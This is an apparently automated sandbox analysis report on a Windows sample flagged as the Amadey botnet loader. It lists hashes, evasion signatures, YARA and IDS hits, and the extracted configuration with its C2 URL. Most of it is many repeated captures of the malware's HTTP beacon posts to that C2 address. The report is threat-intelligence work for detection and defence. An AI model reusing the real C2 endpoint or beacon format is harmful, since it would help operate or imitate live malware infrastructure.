Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1518174
MD5:48d34a4ac51f1a89e010b64fa8cfdcc2
SHA1:ef2a194fbb28562afc735ae4ee74429521ef9105
SHA256:ac848e3af9a5738ef6791dafa2a763a7718c25f1df48a6430827cabe9a5d68f2
Tags:Amadey, exe, user-Bitsight
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 48D34A4AC51F1A89E010B64FA8CFDCC2)
    • axplong.exe (PID: 3384 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 48D34A4AC51F1A89E010B64FA8CFDCC2)
  • axplong.exe (PID: 7556 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 48D34A4AC51F1A89E010B64FA8CFDCC2)
  • cleanup
Name:Amadey
Description:Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source | Rule | Description | Author | Strings
00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.1829925792.0000000000D71000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1789238154.0000000004C80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000005.00000003.2185572649.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000001.00000003.1819093932.0000000004A00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
1.2.axplong.exe.730000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.2.file.exe.d70000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
5.2.axplong.exe.730000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T13:53:23.088893+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 185.215.113.16 | 80 | TCP

AV Detection

Source: file.exe, Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.php, Avira URL Cloud: Label: malware
Source: http://185.215.113.16/, Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ReversingLabs: Detection: 52%
Source: file.exe, ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, Joe Sandbox ML: detected
Source: file.exe, Joe Sandbox ML: detected

Networking

Source: Network traffic, Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.16:80
Source: Malware configuration extractor, IPs: 185.215.113.16
Source: global traffic, HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Source: global traffic, HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
